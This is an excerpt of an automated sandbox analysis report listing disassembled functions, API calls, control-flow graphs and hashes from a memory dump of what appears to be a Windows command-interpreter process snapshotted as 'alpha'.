                                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                      • Instruction Fuzzy Hash: CCE19632A1DA82D6EB50EB10E4417BAF7A0FB88741FC05537E58E42A58DFBCD544CB62
                                                      Function 00007FF7E1DC37D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 821 7ff7e1dc37d8-7ff7e1dc3887 GetCurrentThreadId OpenThread call 7ff7e1dc04f4 HeapSetInformation RegOpenKeyExW 824 7ff7e1dce9f8-7ff7e1dcea3b RegQueryValueExW RegCloseKey 821->824 825 7ff7e1dc388d-7ff7e1dc38eb call 7ff7e1dc5920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff7e1dcea41-7ff7e1dcea59 GetThreadLocale 824->827 825->827 831 7ff7e1dc38f1-7ff7e1dc3913 memset 825->831 829 7ff7e1dcea74-7ff7e1dcea77 827->829 830 7ff7e1dcea5b-7ff7e1dcea67 827->830 834 7ff7e1dcea94-7ff7e1dcea96 829->834 835 7ff7e1dcea79-7ff7e1dcea7d 829->835 830->829 832 7ff7e1dceaa5 831->832 833 7ff7e1dc3919-7ff7e1dc3935 call 7ff7e1dc4d5c 831->833 838 7ff7e1dceaa8-7ff7e1dceab4 832->838 842 7ff7e1dceae2-7ff7e1dceaff call 7ff7e1db3240 call 7ff7e1dd8530 call 7ff7e1dc4c1c 833->842 843 7ff7e1dc393b-7ff7e1dc3942 833->843 834->832 835->834 837 7ff7e1dcea7f-7ff7e1dcea89 835->837 837->834 838->833 840 7ff7e1dceaba-7ff7e1dceac3 838->840 841 7ff7e1dceacb-7ff7e1dceace 840->841 844 7ff7e1dceac5-7ff7e1dceac9 841->844 845 7ff7e1dcead0-7ff7e1dceadb 841->845 853 7ff7e1dceb00-7ff7e1dceb0d 842->853 847 7ff7e1dc3948-7ff7e1dc3962 _setjmp 843->847 848 7ff7e1dceb27-7ff7e1dceb40 _setjmp 843->848 844->841 845->838 851 7ff7e1dceadd 845->851 847->853 854 7ff7e1dc3968-7ff7e1dc396d 847->854 849 7ff7e1dceb46-7ff7e1dceb49 848->849 850 7ff7e1dc39fe-7ff7e1dc3a05 call 7ff7e1dc4c1c 848->850 856 7ff7e1dceb66-7ff7e1dceb6f call 7ff7e1dc01b8 849->856 857 7ff7e1dceb4b-7ff7e1dceb65 call 7ff7e1db3240 call 7ff7e1dd8530 call 7ff7e1dc4c1c 849->857 850->824 851->833 867 7ff7e1dceb15-7ff7e1dceb1f call 7ff7e1dc4c1c 853->867 859 7ff7e1dc396f 854->859 860 7ff7e1dc39b9-7ff7e1dc39bb 854->860 880 7ff7e1dceb71-7ff7e1dceb82 _setmode 856->880 881 7ff7e1dceb87-7ff7e1dceb89 call 7ff7e1dc86f0 856->881 857->856 868 7ff7e1dc3972-7ff7e1dc397d 859->868 863 7ff7e1dc39c1-7ff7e1dc39c3 call 7ff7e1dc4c1c 860->863 864 7ff7e1dceb20 860->864 877 7ff7e1dc39c8 863->877 864->848 867->864 874 7ff7e1dc397f-7ff7e1dc3984 868->874 875 7ff7e1dc39c9-7ff7e1dc39de call 7ff7e1dbdf60 868->875 874->868 883 7ff7e1dc3986-7ff7e1dc39ae call 7ff7e1dc0580 GetConsoleOutputCP GetCPInfo call 7ff7e1dc04f4 874->883 875->867 891 7ff7e1dc39e4-7ff7e1dc39e8 875->891 877->875 880->881 888 7ff7e1dceb8e-7ff7e1dcebad call 7ff7e1dc58e4 call 7ff7e1dbdf60 881->888 897 7ff7e1dc39b3 883->897 902 7ff7e1dcebaf-7ff7e1dcebb3 888->902 891->850 895 7ff7e1dc39ea-7ff7e1dc39ef call 7ff7e1dbbe00 891->895 900 7ff7e1dc39f4-7ff7e1dc39fc 895->900 897->860 900->874 902->850 903 7ff7e1dcebb9-7ff7e1dcec24 call 7ff7e1dc58e4 GetConsoleOutputCP GetCPInfo call 7ff7e1dc04f4 call 7ff7e1dbbe00 call 7ff7e1dc0580 GetConsoleOutputCP GetCPInfo call 7ff7e1dc04f4 902->903 903->888
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                      • API String ID: 2624720099-1920437939
                                                      • Opcode ID: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                      • Instruction ID: 47d1fd29b5b00acabf864d9dbf6b996e61c36cb48728def3869b3f6a398cf110
                                                      • Opcode Fuzzy Hash: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                      • Instruction Fuzzy Hash: 4CC1E071F086429AF714FB6498423BDFAA0FF49744FC4853BD90E86695DEBCA440C7A2
                                                      Function 00007FF7E1DC823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1118 7ff7e1dc823c-7ff7e1dc829b FindFirstFileExW 1119 7ff7e1dc82cd-7ff7e1dc82df 1118->1119 1120 7ff7e1dc829d-7ff7e1dc82a9 GetLastError 1118->1120 1124 7ff7e1dc8365-7ff7e1dc837b FindNextFileW 1119->1124 1125 7ff7e1dc82e5-7ff7e1dc82ee 1119->1125 1121 7ff7e1dc82af 1120->1121 1123 7ff7e1dc82b1-7ff7e1dc82cb 1121->1123 1127 7ff7e1dc83d0-7ff7e1dc83e5 FindClose 1124->1127 1128 7ff7e1dc837d-7ff7e1dc8380 1124->1128 1126 7ff7e1dc82f1-7ff7e1dc82f4 1125->1126 1130 7ff7e1dc82f6-7ff7e1dc8300 1126->1130 1131 7ff7e1dc8329-7ff7e1dc832b 1126->1131 1127->1126 1128->1119 1129 7ff7e1dc8386 1128->1129 1129->1120 1132 7ff7e1dc8332-7ff7e1dc8353 GetProcessHeap HeapAlloc 1130->1132 1133 7ff7e1dc8302-7ff7e1dc830e 1130->1133 1131->1121 1134 7ff7e1dc832d 1131->1134 1137 7ff7e1dc8356-7ff7e1dc8363 1132->1137 1135 7ff7e1dc8310-7ff7e1dc8313 1133->1135 1136 7ff7e1dc838b-7ff7e1dc83c2 GetProcessHeap HeapReAlloc 1133->1136 1134->1120 1140 7ff7e1dc8315-7ff7e1dc8323 1135->1140 1141 7ff7e1dc8327 1135->1141 1138 7ff7e1dd50f8-7ff7e1dd511e GetLastError FindClose 1136->1138 1139 7ff7e1dc83c8-7ff7e1dc83ce 1136->1139 1137->1135 1138->1123 1139->1137 1140->1141 1141->1131
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileFindFirstLast
                                                      • String ID:
                                                      • API String ID: 873889042-0
                                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                      • Instruction ID: 158bb9ef9b0325c1935fa0e7ccece0d372344554734bac7449e1d756c1d438cb
                                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                      • Instruction Fuzzy Hash: 70516D71A09B4686E700EF11E445779FBA1FB49B82F859532CA1D43354CFBCE464CB61
                                                      Function 00007FF7E1DC2978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1142 7ff7e1dc2978-7ff7e1dc29b6 1143 7ff7e1dc29b9-7ff7e1dc29c1 1142->1143 1143->1143 1144 7ff7e1dc29c3-7ff7e1dc29c5 1143->1144 1145 7ff7e1dce441 1144->1145 1146 7ff7e1dc29cb-7ff7e1dc29cf 1144->1146 1147 7ff7e1dc29d2-7ff7e1dc29da 1146->1147 1148 7ff7e1dc2a1e-7ff7e1dc2a3e FindFirstFileW 1147->1148 1149 7ff7e1dc29dc-7ff7e1dc29e1 1147->1149 1150 7ff7e1dce435-7ff7e1dce439 1148->1150 1151 7ff7e1dc2a44-7ff7e1dc2a5c FindClose 1148->1151 1149->1148 1152 7ff7e1dc29e3-7ff7e1dc29eb 1149->1152 1150->1145 1153 7ff7e1dc2a62-7ff7e1dc2a6e 1151->1153 1154 7ff7e1dc2ae3-7ff7e1dc2ae5 1151->1154 1152->1147 1155 7ff7e1dc29ed-7ff7e1dc2a1c call 7ff7e1dc8f80 1152->1155 1156 7ff7e1dc2a70-7ff7e1dc2a78 1153->1156 1157 7ff7e1dce3f7-7ff7e1dce3ff 1154->1157 1158 7ff7e1dc2aeb-7ff7e1dc2b10 _wcsnicmp 1154->1158 1156->1156 1160 7ff7e1dc2a7a-7ff7e1dc2a8d 1156->1160 1158->1153 1161 7ff7e1dc2b16-7ff7e1dce3f1 _wcsicmp 1158->1161 1160->1145 1163 7ff7e1dc2a93-7ff7e1dc2a97 1160->1163 1161->1153 1161->1157 1165 7ff7e1dce404-7ff7e1dce407 1163->1165 1166 7ff7e1dc2a9d-7ff7e1dc2ade memmove call 7ff7e1dc13e0 1163->1166 1168 7ff7e1dce40b-7ff7e1dce413 1165->1168 1166->1152 1168->1168 1170 7ff7e1dce415-7ff7e1dce42b memmove 1168->1170 1170->1150
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                      • Instruction ID: ec894e96bb4b6e7506576d69eb1ec3dc8df868198d466ed4926a31adc3a0c872
                                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                      • Instruction Fuzzy Hash: 0F510462B0868285EB30EB15A9463BAE690FB84BE4FC44632DE6E476D0DF7CE441C651
                                                      Function 00007FF7E1DC4D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 643 7ff7e1dc4d5c-7ff7e1dc4e4b InitializeCriticalSection call 7ff7e1dc58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7e1dc0580 call 7ff7e1dc4a14 call 7ff7e1dc4ad0 call 7ff7e1dc5554 GetCommandLineW 654 7ff7e1dc4e4d-7ff7e1dc4e54 643->654 654->654 655 7ff7e1dc4e56-7ff7e1dc4e61 654->655 656 7ff7e1dc51cf-7ff7e1dc51e3 call 7ff7e1db3278 call 7ff7e1dc4c1c 655->656 657 7ff7e1dc4e67-7ff7e1dc4e7b call 7ff7e1dc2e44 655->657 662 7ff7e1dc4e81-7ff7e1dc4ec3 GetCommandLineW call 7ff7e1dc13e0 call 7ff7e1dbca40 657->662 663 7ff7e1dc51ba-7ff7e1dc51ce call 7ff7e1db3278 call 7ff7e1dc4c1c 657->663 662->663 674 7ff7e1dc4ec9-7ff7e1dc4ee8 call 7ff7e1dc417c call 7ff7e1dc2394 662->674 663->656 678 7ff7e1dc4eed-7ff7e1dc4ef5 674->678 678->678 679 7ff7e1dc4ef7-7ff7e1dc4f1f call 7ff7e1dbaa54 678->679 682 7ff7e1dc4f21-7ff7e1dc4f30 679->682 683 7ff7e1dc4f95-7ff7e1dc4fee GetConsoleOutputCP GetCPInfo call 7ff7e1dc51ec GetProcessHeap HeapAlloc 679->683 682->683 685 7ff7e1dc4f32-7ff7e1dc4f39 682->685 689 7ff7e1dc5012-7ff7e1dc5018 683->689 690 7ff7e1dc4ff0-7ff7e1dc5006 GetConsoleTitleW 683->690 685->683 687 7ff7e1dc4f3b-7ff7e1dc4f77 call 7ff7e1db3278 GetWindowsDirectoryW 685->687 695 7ff7e1dc51b1-7ff7e1dc51b9 call 7ff7e1dc4c1c 687->695 696 7ff7e1dc4f7d-7ff7e1dc4f90 call 7ff7e1dc3c24 687->696 693 7ff7e1dc507a-7ff7e1dc507e 689->693 694 7ff7e1dc501a-7ff7e1dc5024 call 7ff7e1dc3578 689->694 690->689 692 7ff7e1dc5008-7ff7e1dc500f 690->692 692->689 697 7ff7e1dc5080-7ff7e1dc50b3 call 7ff7e1ddb89c call 7ff7e1db586c call 7ff7e1db3240 call 7ff7e1dc3448 693->697 698 7ff7e1dc50eb-7ff7e1dc5161 GetModuleHandleW GetProcAddress * 3 693->698 694->693 709 7ff7e1dc5026-7ff7e1dc5030 694->709 695->663 696->683 724 7ff7e1dc50d2-7ff7e1dc50d7 call 7ff7e1db3278 697->724 725 7ff7e1dc50b5-7ff7e1dc50d0 call 7ff7e1dc3448 * 2 697->725 702 7ff7e1dc516f 698->702 703 7ff7e1dc5163-7ff7e1dc5167 698->703 708 7ff7e1dc5172-7ff7e1dc51af free call 7ff7e1dc8f80 702->708 703->702 707 7ff7e1dc5169-7ff7e1dc516d 703->707 707->702 707->708 713 7ff7e1dc5032-7ff7e1dc5059 GetStdHandle GetConsoleScreenBufferInfo 709->713 714 7ff7e1dc5075 call 7ff7e1ddcff0 709->714 718 7ff7e1dc5069-7ff7e1dc5073 713->718 719 7ff7e1dc505b-7ff7e1dc5067 713->719 714->693 718->693 718->714 719->693 728 7ff7e1dc50dc-7ff7e1dc50e6 GlobalFree 724->728 725->728 728->698
                                                      APIs
                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4D9A
                                                        • Part of subcall function 00007FF7E1DC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7E1DDC6DB), ref: 00007FF7E1DC58EF
                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4DBB
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC4DCA
                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4DE0
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC4DEE
                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E04
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC0589
                                                        • Part of subcall function 00007FF7E1DC0580: SetConsoleMode.KERNELBASE ref: 00007FF7E1DC059E
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC05AF
                                                        • Part of subcall function 00007FF7E1DC0580: GetConsoleMode.KERNELBASE ref: 00007FF7E1DC05C5
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC05EF
                                                        • Part of subcall function 00007FF7E1DC0580: GetConsoleMode.KERNELBASE ref: 00007FF7E1DC0605
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC0632
                                                        • Part of subcall function 00007FF7E1DC0580: SetConsoleMode.KERNELBASE ref: 00007FF7E1DC0647
                                                        • Part of subcall function 00007FF7E1DC4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                        • Part of subcall function 00007FF7E1DC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                        • Part of subcall function 00007FF7E1DC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
                                                        • Part of subcall function 00007FF7E1DC4A14: memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                        • Part of subcall function 00007FF7E1DC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                        • Part of subcall function 00007FF7E1DC4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AD6
                                                        • Part of subcall function 00007FF7E1DC4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AEF
                                                        • Part of subcall function 00007FF7E1DC5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7E1DC4E35), ref: 00007FF7E1DC55DA
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5623
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5667
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC56BE
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5702
                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E35
                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E81
                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4F69
                                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4F95
                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FB0
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FC1
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FD8
                                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FF8
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5037
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC504B
                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC50DF
                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC50F2
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC510F
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5130
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC514A
                                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5175
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                      • API String ID: 1049357271-3021193919
                                                      • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                      • Instruction ID: 359a3c70616b9cacae5f44e083aeee61fc86ae4e41e3989a39ae451a5ba3c388
                                                      • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                      • Instruction Fuzzy Hash: 17C17261E08A4296EB04FB11A806379F7A0FF89B91FC48536D90E43395DFBCE545C3A2
                                                      Function 00007FF7E1DC3C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 732 7ff7e1dc3c24-7ff7e1dc3c61 733 7ff7e1dc3c67-7ff7e1dc3c99 call 7ff7e1dbaf14 call 7ff7e1dbca40 732->733 734 7ff7e1dcec5a-7ff7e1dcec5f 732->734 743 7ff7e1dc3c9f-7ff7e1dc3cb2 call 7ff7e1dbb900 733->743 744 7ff7e1dcec97-7ff7e1dceca1 call 7ff7e1dc855c 733->744 734->733 736 7ff7e1dcec65-7ff7e1dcec6a 734->736 738 7ff7e1dc412e-7ff7e1dc415b call 7ff7e1dc8f80 736->738 743->744 749 7ff7e1dc3cb8-7ff7e1dc3cbc 743->749 750 7ff7e1dc3cbf-7ff7e1dc3cc7 749->750 750->750 751 7ff7e1dc3cc9-7ff7e1dc3ccd 750->751 752 7ff7e1dc3cd2-7ff7e1dc3cd8 751->752 753 7ff7e1dc3ce5-7ff7e1dc3d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff7e1dc3cda-7ff7e1dc3cdf 752->754 756 7ff7e1dc3fb8 753->756 757 7ff7e1dc3d68-7ff7e1dc3d6c 753->757 754->753 755 7ff7e1dc3faa-7ff7e1dc3fb3 754->755 755->752 759 7ff7e1dc3fc6-7ff7e1dc3fec GetLastError call 7ff7e1dc855c call 7ff7e1dca5d6 756->759 757->756 758 7ff7e1dc3d72-7ff7e1dc3dcd towupper GetFullPathNameW 757->758 758->759 760 7ff7e1dc3dd3-7ff7e1dc3ddd 758->760 762 7ff7e1dc3ff1-7ff7e1dc4007 call 7ff7e1dc855c _local_unwind 759->762 760->762 763 7ff7e1dc3de3-7ff7e1dc3dfb 760->763 774 7ff7e1dc400c-7ff7e1dc4022 GetLastError 762->774 765 7ff7e1dc3e01-7ff7e1dc3e11 763->765 766 7ff7e1dc40fe-7ff7e1dc4119 call 7ff7e1dc855c _local_unwind 763->766 765->766 770 7ff7e1dc3e17-7ff7e1dc3e28 765->770 775 7ff7e1dc411a-7ff7e1dc412c call 7ff7e1dbff70 call 7ff7e1dc855c 766->775 773 7ff7e1dc3e2c-7ff7e1dc3e34 770->773 773->773 776 7ff7e1dc3e36-7ff7e1dc3e3f 773->776 777 7ff7e1dc3e95-7ff7e1dc3e9c 774->777 778 7ff7e1dc4028-7ff7e1dc402b 774->778 775->738 783 7ff7e1dc3e42-7ff7e1dc3e55 776->783 780 7ff7e1dc3ecf-7ff7e1dc3ed3 777->780 781 7ff7e1dc3e9e-7ff7e1dc3ec2 call 7ff7e1dc2978 777->781 